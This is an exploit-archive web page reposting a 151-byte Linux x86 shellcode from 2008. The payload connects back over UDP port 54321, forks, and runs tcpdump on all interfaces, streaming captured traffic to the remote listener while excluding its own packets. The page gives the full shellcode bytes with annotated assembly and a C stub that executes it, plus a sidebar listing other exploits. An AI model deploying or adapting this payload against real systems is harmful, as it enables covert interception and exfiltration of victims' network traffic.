首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
linux/x86 connect-back port UDP/54321 live packet capture 151 bytes
来源:http://xenomuta.tuxfamily.org 作者:xenomuta 发布时间:2008-11-24  
/*
linux/x86 connect-back port UDP/54321 & dup2 &
fork() & execve() /usr/bin/tcpdump -iany -w- "port ! 54321"
151 bytes
by XenoMuta
     _  __                 __  ___      __      
    | |/ /__  ____  ____  /  |/  /_  __/ /_____ _
    |   / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
   /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ /
  /_/|_\___/_/ /_/\____/_/  /_/\__,_/\__/\__,_/ 

   xenomuta [ arroba ] phreaker [ punto ] net

  http://xenomuta.tuxfamily.org/ - Methylxantina 256mg
 
- God bless you all -

*/
unsigned char sc[] =
// <_start>:
"\x6a\x66" // push   $0x66 ; socketcall()
"\x58" // pop    %eax  ; para setear el socket
"\x6a\x01" // push   $0x1 
"\x5b" // pop    %ebx
"\x31\xc9" // xor    %ecx,%ecx
"\x51" // push   %ecx
"\x6a\x02" // push   $0x2  ; SOCK_DGRAM (udp)
"\x6a\x02" // push   $0x2  
"\x89\xe1" // mov    %esp,%ecx
"\xcd\x80" // int    $0x80
// IP: 127.1.1.1
"\x68\x7f\x01\x01\x01" // push   $0x101017f
// Port: 54321
"\x66\x68\xd4\x31" // pushw  $0x31d4
"\x66\x31\xc9" // xor    %cx,%cx
"\x80\xc1\x02" // xadd    $0x2,%cl
"\x66\x51" // push   %cx
"\x89\xe1" // mov    %esp,%ecx
"\x6a\x10" // push   $0x10
"\x51" // push   %ecx
"\x50" // push   %eax
"\x89\xe1" // mov    %esp,%ecx
"\x89\xc6" // mov    %eax,%esi
"\xb0\x66" // mov    $0x66,%al  ; socketcall ()
"\x80\xc3\x02" // add    $0x2,%bl   ; para connect()
"\xcd\x80" // int    $0x80
"\x87\xde" // xchg   %ebx,%esi 
"\x6a\x01" // push   $0x1
"\x59" // pop    %ecx
"\x6a\x3f" // push   $0x3f      ; dup2(socket, stdout)
"\x58" // pop    %eax
"\xcd\x80" // int    $0x80
"\x31\xd2" // xor    %edx,%edx 
"\x6a\x02" // push   $0x2       ; fork()
"\x58" // pop    %eax
"\xcd\x80" // int    $0x80
"\x39\xd0" // cmp    %edx,%eax  ; el hijo sobrevive
"\x74\x05" // je     0x4d <_child>
"\x6a\x01" // push   $0x1       ; adios papa
"\x58" // pop    %eax
"\xcd\x80" // int    $0x80
//<_child>:
"\x6a\x0b" // push   $0xb    ; execve() tcpdump -iany -w- "port ! 54321"
"\x58" // pop    %eax    ; sniffea todo menos a mi mismo.
"\x52" // push   %edx
"\x68\x34\x33\x32\x31" // push   $0x31323334 ; "port ! 54321"
"\x68\x20\x21\x20\x35" // push   $0x35202120
"\x68\x70\x6f\x72\x74" // push   $0x74726f70
"\x89\xe7" // mov    %esp,%edi
"\x52" // push   %edx
"\x6a\x2d" // push   $0x2d               ; -w- ( escribe a stdout )
"\x66\x68\x2d\x77" // pushw  $0x772d
"\x89\xe6" // mov    %esp,%esi
"\x52" // push   %edx
"\x6a\x79" // push   $0x79               ; -iany (todas las interfaces )
"\x68\x2d\x69\x61\x6e" // push   $0x6e61692d
"\x89\xe1" // mov    %esp,%ecx
"\x52" // push   %edx
"\x6a\x70" // push   $0x70
"\x68\x70\x64\x75\x6d" // push   $0x6d756470 ; /usr/bin/tcpdump
"\x68\x6e\x2f\x74\x63" // push   $0x63742f6e
"\x68\x2f\x73\x62\x69" // push   $0x6962732f
"\x68\x2f\x75\x73\x72" // push   $0x7273752f
"\x89\xe3" // mov    %esp,%ebx
"\x52" // push   %edx
"\x57" // push   %edi
"\x56" // push   %esi
"\x51" // push   %ecx
"\x53" // push   %ebx
"\x89\xe1" // mov    %esp,%ecx
"\xcd\x80"; // int    $0x80


main(){(*(void (*)()) sc)();}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·linux/x86 execve(/bin/sh,0,0)
·linux/x86 append rsa key to /r
·LoveCMS 1.6.2 Final (Simple Fo
·KVIrc 3.4.2 Shiny (uri handler
·linux/x86 setuid(0) & execve(/
·Microsoft XML Core Services DT
·Nero ShowTime 5.0.15.0 m3u Pla
·Discuz! Reset User Password Vu
·W3C Amaya 10.1 Web Browser (UR
·Oracle Database Vault ptrace(
·VideoScript 3.0 <= 4.0.1.50 Of
·vBulletin 3.7.3 Visitor Messag
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved